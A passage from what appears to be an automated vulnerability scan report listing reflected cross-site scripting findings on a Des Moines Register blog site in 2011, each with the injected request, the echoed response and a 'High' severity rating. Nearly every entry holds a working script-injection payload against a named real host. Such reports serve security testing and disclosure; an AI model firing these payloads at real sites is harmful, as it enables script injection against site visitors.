Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1297527888; fc=H4sIAAAAAAAAAONlYOTgYWBgYGRg0GlkYAAA0iY5Vg8AAAA=; _wc[1297527893965]=H4sIAAAAAAAAAONgYGRg0GnkYGBiYOiq5WBgZmAozGQAAHz1QNYWAAAA; i=8e1bb757-a622-431b-967f-869e18a071fe

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=iso-8859-1
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=a5f1e488-0086-4735-aa4d-21bbfb1228f5; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1297647248; version=1; path=/; domain=.openx.net; max-age=63072000;
Set-Cookie: _wc[1297527893965]=; version=1; path=/; domain=.openx.net; max-age=0;
Set-Cookie: fc=H4sIAAAAAAAAAONlYOTgYWBgYGRg0GlkYAAA0iY5Vg8AAAA=; version=1; path=/; domain=.openx.net; max-age=31536000;

OXM_425158943748223a<script>alert(1)</script>b163a0573ec({"r":null});

1.108. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba9f3"><script>alert(1)</script>2ae6c40c144 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmrba9f3"><script>alert(1)</script>2ae6c40c144/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69963

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmrba9f3"><script>alert(1)</script>2ae6c40c144/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/" />
...[SNIP]...

1.109. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52d0a"%3balert(1)//c81c644a5e5 was submitted in the REST URL parameter 1. This input was echoed as 52d0a";alert(1)//c81c644a5e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr52d0a"%3balert(1)//c81c644a5e5/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69887

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...

       depends: ['social.pluck.api'],
       requires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr52d0a";alert(1)//c81c644a5e5/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatu
...[SNIP]...

1.110. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6faae"%3balert(1)//4cf314e0707 was submitted in the REST URL parameter 2. This input was echoed as 6faae";alert(1)//4cf314e0707 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/index.php6faae"%3balert(1)//4cf314e0707/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:36:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69887

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
s: ['social.pluck.api'],
       requires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/index.php6faae";alert(1)//4cf314e0707/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   s
...[SNIP]...

1.111. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de38b"><script>alert(1)</script>874a658779c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/index.phpde38b"><script>alert(1)</script>874a658779c/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:36:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69963

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/index.phpde38b"><script>alert(1)</script>874a658779c/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/" />
...[SNIP]...

1.112. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecfa6</script><script>alert(1)</script>3132b775423 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/?ecfa6</script><script>alert(1)</script>3132b775423=1 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Cookie,Accept-Encoding,User-Agent
X-Pingback: http://blogs.desmoinesregister.com/dmr/xmlrpc.php
Link: <http://blogs.desmoinesregister.com/dmr/?p=110113>; rel=shortlink
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 104095

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:pas>


<head>
<title>Daniels at CPAC calls for
...[SNIP]...
oad, civil, conservative coalition &laquo; Des Moines Register Staff Blogs",
   type:"article",
   articleinturl: "/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/?ecfa6</script><script>alert(1)</script>3132b775423=1",
   categorymain:"News",
   categoryname:"News",
   categoryid:"NEWS",
   pluckpage: 0,
   url: {
       hostname: "blogs.desmoinesregister.com",
       domainname: "DesMoinesRegister.com",
       domainroot: "Des
...[SNIP]...

1.113. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/audio-player/assets/audio-player.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52af9"><script>alert(1)</script>873102b4d8f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/audio-player/assets/audio-player.js52af9"><script>alert(1)</script>873102b4d8f?ver=2.0.4.1 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69523

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.js52af9"><script>alert(1)</script>873102b4d8f" />
...[SNIP]...

1.114. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/audio-player/assets/audio-player.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa9ca"%3balert(1)//678e5566e0f was submitted in the REST URL parameter 6. This input was echoed as fa9ca";alert(1)//678e5566e0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/audio-player/assets/audio-player.jsfa9ca"%3balert(1)//678e5566e0f?ver=2.0.4.1 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69785

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.jsfa9ca";alert(1)//678e5566e0f","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.115. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33e51"%3balert(1)//000cbdc337f was submitted in the REST URL parameter 5. This input was echoed as 33e51";alert(1)//000cbdc337f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js33e51"%3balert(1)//000cbdc337f?ver=3.0.4 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69745

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
s:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js33e51";alert(1)//000cbdc337f","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.116. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3b42"><script>alert(1)</script>3113957a202 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/dmr-tweets/jquery.tweet.jsc3b42"><script>alert(1)</script>3113957a202?ver=3.0.4 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69483

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.jsc3b42"><script>alert(1)</script>3113957a202" />
...[SNIP]...

1.117. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32dec"%3balert(1)//9a97554e736 was submitted in the REST URL parameter 6. This input was echoed as 32dec";alert(1)//9a97554e736 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css32dec"%3balert(1)//9a97554e736?ver=1.0.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69775

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css32dec";alert(1)//9a97554e736","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.118. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b88e4"><script>alert(1)</script>22ba7e59903 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/css/nggallery.cssb88e4"><script>alert(1)</script>22ba7e59903?ver=1.0.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69513

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.cssb88e4"><script>alert(1)</script>22ba7e59903" />
...[SNIP]...

1.119. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5488"><script>alert(1)</script>683302c7758 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.cssc5488"><script>alert(1)</script>683302c7758?ver=1.3.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69557

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.cssc5488"><script>alert(1)</script>683302c7758" />
...[SNIP]...

1.120. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe488"%3balert(1)//e8899a6b1a0 was submitted in the REST URL parameter 6. This input was echoed as fe488";alert(1)//e8899a6b1a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.cssfe488"%3balert(1)//e8899a6b1a0?ver=1.3.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69819

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
ript'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.cssfe488";alert(1)//e8899a6b1a0","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.121. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

